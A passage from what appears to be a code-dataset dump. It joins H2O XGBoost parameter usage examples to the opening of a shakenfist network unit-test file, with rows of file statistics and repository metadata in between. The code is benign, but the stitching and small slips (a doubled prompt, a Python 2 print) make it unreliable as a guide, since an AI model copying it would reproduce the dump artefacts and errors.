... distribution="bernoulli",
... learn_rate=0.1,
... max_depth=3,
... export_checkpoints_dir=checkpoints_dir)
>>> len(listdir(checkpoints_dir))
""",
ntrees="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> tree_num = [20, 50, 80, 110, 140, 170, 200]
>>> label = ["20", "50", "80", "110",
... "140", "170", "200"]
>>> for key, num in enumerate(tree_num):
# Input integer for 'num' and 'key'
>>> titanic_xgb = H2OXGBoostEstimator(ntrees=num,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(label[key], 'training score',
... titanic_xgb.auc(train=True))
>>> print(label[key], 'validation score',
... titanic_xgb.auc(valid=True))
""",
max_depth="""
>>> df = h2o.import_file(path = "http://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> response = "survived"
>>> df[response] = df[response].asfactor()
>>> predictors = df.columns
>>> del predictors[1:3]
>>> train, valid, test = df.split_frame(ratios=[0.6,0.2],
... seed=1234,
... destination_frames=
... ['train.hex',
... 'valid.hex',
... 'test.hex'])
>>> xgb = H2OXGBoostEstimator()
>>> xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> perf = xgb.model_performance(valid)
>>> print perf.auc()
""",
min_rows="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_rows=16,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
min_child_weight="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_child_weight=16,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
learn_rate="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8], seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(ntrees=10000,
... learn_rate=0.01,
... stopping_rounds=5,
... stopping_metric="AUC",
... stopping_tolerance=1e-4,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
eta="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(ntrees=10000,
... learn_rate=0.01,
... stopping_rounds=5,
... stopping_metric="AUC",
... stopping_tolerance=1e-4,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
sample_rate="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(sample_rate=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
subsample="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(sample_rate=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
col_sample_rate="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(col_sample_rate=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
colsample_bylevel="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(col_sample_rate=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
col_sample_rate_per_tree="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8], seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(col_sample_rate_per_tree=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
colsample_bytree="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8], seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(col_sample_rate_per_tree=.7,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
max_abs_leafnode_pred="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_abs_leafnode_pred=float(2),
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
max_delta_step="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_delta_step=float(2),
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
monotone_constraints="""
>>> prostate_hex = h2o.import_file("http://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv.zip")
>>> prostate_hex["CAPSULE"] = prostate_hex["CAPSULE"].asfactor()
>>> response = "CAPSULE"
>>> seed=42
>>> monotone_constraints={"AGE":1}
>>> xgb_model = H2OXGBoostEstimator(seed=seed,
... monotone_constraints=monotone_constraints)
>>> xgb_model.train(y=response,
... ignored_columns=["ID"],
... training_frame=prostate_hex)
>>> xgb_model.scoring_history()
""",
score_tree_interval="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(score_tree_interval=5,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> airlines_xgb.scoring_history()
""",
min_split_improvement="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_split_improvement=0.55,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
gamma="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_split_improvement=1e-3,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
nthread="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8], seed=1234)
>>> thread = 4
>>> titanic_xgb = H2OXGBoostEstimator(nthread=thread,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=titanic)
>>> print(titanic_xgb.auc(train=True))
""",
max_bins="""
>>> covtype = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/covtype/covtype.20k.data")
>>> covtype[54] = covtype[54].asfactor()
>>> predictors = covtype.columns[0:54]
>>> response = 'C55'
>>> train, valid = covtype.split_frame(ratios=[.8],
... seed=1234)
>>> cov_xgb = H2OXGBoostEstimator(max_bins=200,
... seed=1234)
>>> cov_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(cov_xgb.logloss(valid=True))
""",
max_leaves="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(max_leaves=0, seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
min_sum_hessian_in_leaf="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_sum_hessian_in_leaf=90.5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
min_data_in_leaf="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_data_in_leaf=0.55,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
sample_type="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"]= airlines["Year"].asfactor()
>>> airlines["Month"]= airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(sample_type="weighted",
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
normalize_type="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(booster='dart',
... normalize_type="tree",
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
rate_drop="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(rate_drop=0.1, seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
one_drop="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(booster='dart',
... one_drop=True,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
skip_drop="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(skip_drop=0.5,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> airlines_xgb.auc(train=True)
""",
tree_method="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> >>> airlines_xgb = H2OXGBoostEstimator(seed=1234,
... tree_method="approx")
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
grow_policy="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> titanic["const_1"] = 6
>>> titanic["const_2"] = 7
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234,
... grow_policy="depthwise")
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
booster="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(booster='dart',
... normalize_type="tree",
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
reg_lambda="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8])
>>> airlines_xgb = H2OXGBoostEstimator(reg_lambda=.0001,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
reg_alpha="""
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
>>> boston_xgb = H2OXGBoostEstimator(reg_alpha=.25)
>>> boston_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(boston_xgb.mse(valid=True))
""",
dmatrix_type="""
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
>>> boston_xgb = H2OXGBoostEstimator(dmatrix_type="auto",
... seed=1234)
>>> boston_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> boston_xgb.mse()
""",
gpu_id="""
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
>>> boston_xgb = H2OXGBoostEstimator(gpu_id=0,
... seed=1234)
>>> boston_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> boston_xgb.mse()
""",
backend="""
>>> pros = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv")
>>> pros["CAPSULE"] = pros["CAPSULE"].asfactor()
>>> pros_xgb = H2OXGBoostEstimator(tree_method="exact",
... seed=123,
... backend="cpu")
>>> pros_xgb.train(y="CAPSULE",
... ignored_columns=["ID"],
... training_frame=pros)
>>> pros_xgb.auc()
"""
)
| 45.150476
| 149
| 0.578784
| 4,664
| 47,408
| 5.730274
| 0.063679
| 0.03143
| 0.028699
| 0.037529
| 0.868592
| 0.859238
| 0.856282
| 0.848051
| 0.84603
| 0.844159
| 0
| 0.027474
| 0.235319
| 47,408
| 1,049
| 150
| 45.193518
| 0.709754
| 0.011137
| 0
| 0.782524
| 0
| 0.057282
| 0.959323
| 0.338007
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001942
| false
| 0
| 0.061165
| 0
| 0.065049
| 0.033981
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1323d0da589721f2ebae3243e0df15be7eec9c87
| 11,416
|
py
|
Python
|
shakenfist/tests/test_net.py
|
mandoonandy/shakenfist
|
b96ebaf2e304233cc3bab7131895ef6ba685289b
|
[
"Apache-2.0"
] | 24
|
2020-07-20T23:47:52.000Z
|
2022-02-10T05:12:01.000Z
|
shakenfist/tests/test_net.py
|
mandoonandy/shakenfist
|
b96ebaf2e304233cc3bab7131895ef6ba685289b
|
[
"Apache-2.0"
] | 637
|
2020-06-19T06:57:30.000Z
|
2022-03-31T08:58:54.000Z
|
shakenfist/tests/test_net.py
|
mandoonandy/shakenfist
|
b96ebaf2e304233cc3bab7131895ef6ba685289b
|
[
"Apache-2.0"
] | 7
|
2020-07-14T20:48:40.000Z
|
2021-12-18T10:06:51.000Z
|
import mock
import testtools
from shakenfist.baseobject import DatabaseBackedObject as dbo
from shakenfist import exceptions
from shakenfist import net
from shakenfist.config import SFConfig
from shakenfist.tests import base
class NetworkTestCase(base.ShakenFistTestCase):
def setUp(self):
super(NetworkTestCase, self).setUp()
self.ipmanager_get = mock.patch(
'shakenfist.ipmanager.IPManager.from_db')
self.mock_ipmanager_get = self.ipmanager_get.start()
self.addCleanup(self.ipmanager_get.stop)
self.ipmanager_persist = mock.patch(
'shakenfist.db.persist_ipmanager')
self.mock_ipmanager_persist = self.ipmanager_persist.start()
self.addCleanup(self.ipmanager_persist.stop)
self.etcd_client = mock.patch('etcd3.client')
self.mock_etcd_client = self.etcd_client.start()
self.addCleanup(self.etcd_client.stop)
self.etcd_lock = mock.patch('shakenfist.etcd.ActualLock')
self.mock_etcd_lock = self.etcd_lock.start()
self.addCleanup(self.etcd_lock.stop)
class NetworkGeneralTestCase(NetworkTestCase):
def test_init(self):
net.Network({
'uuid': 'notauuid',
'vxid': 2,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
def test_str(self):
n = net.Network({
'uuid': 'notauuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertEqual('network(notauuid)', str(n))
class NetworkNormalNodeTestCase(NetworkTestCase):
def setUp(self):
super(NetworkNormalNodeTestCase, self).setUp()
fake_config = SFConfig(NODE_EGRESS_IP='1.1.1.2',
NODE_MESH_IP='1.1.1.2',
NETWORK_NODE_IP='1.1.1.2')
self.config = mock.patch('shakenfist.net.config', fake_config)
self.mock_config = self.config.start()
self.addCleanup(self.config.stop)
#
# is_okay()
#
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_yes(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=False)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_not_created(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=False)
@mock.patch('shakenfist.net.config', SFConfig(NODE_EGRESS_IP='1.1.1.1',
NODE_MESH_IP='1.1.1.2',
NETWORK_NODE_IP='1.1.1.2',
NODE_IS_NETWORK_NODE=True))
def test_is_okay_no_dns(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
class NetworkNetNodeTestCase(NetworkTestCase):
def setUp(self):
super(NetworkNetNodeTestCase, self).setUp()
fake_config = SFConfig(NODE_EGRESS_IP='1.1.1.2',
NODE_MESH_IP='1.1.1.2',
NETWORK_NODE_IP='1.1.1.2',
NODE_IS_NETWORK_NODE=True)
self.config = mock.patch('shakenfist.net.config', fake_config)
self.mock_config = self.config.start()
self.addCleanup(self.config.stop)
#
# is_okay()
#
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_yes(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_okay())
